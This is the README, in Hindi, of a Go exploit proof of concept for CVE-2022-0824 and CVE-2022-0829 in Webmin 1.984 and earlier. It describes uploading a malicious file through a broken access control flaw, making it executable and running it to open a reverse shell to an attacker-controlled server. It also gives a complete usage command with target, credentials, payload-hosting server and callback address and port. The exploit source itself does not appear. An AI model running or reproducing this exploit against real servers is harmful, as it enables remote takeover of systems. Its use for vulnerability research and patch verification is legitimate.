
CVE-2022-0824 के लिए एक्सप्लॉइट PoC
Webmin <= 1.984 में RCE
CVE-2022-0824 और CVE-2022-0829
यह BAC भेद्यता का उपयोग करके Webmin में एक दुर्भावनापूर्ण फ़ाइल अपलोड करता है,
फ़ाइल पर अनुमतियाँ बदलता है, और फ़ाइल को निष्पादित करता है। यह फ़ाइल,
makePayload फ़ंक्शन में बनाई गई, हमलावर के नियंत्रण वाले सर्वर पर एक रिवर्स शेल है।
go run cve-2022-0824.go -t "https://172.16.177.132:10000" -c "username:password" -sl 172.16.177.1:8999 -s 172.16.177.1 -p 4444
t -> लक्ष्य URL
c -> Webmin के लिए क्रेडेंशियल्स
sl -> आपके पेलोड को होस्ट करने के लिए आपका स्थानीय सर्वर IP और पोर्ट
s -> कॉलबैक IP
p -> कॉलबैक पोर्ट
https://www.webmin.com/security.html
https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/
https://nvd.nist.gov/vuln/detail/CVE-2022-0824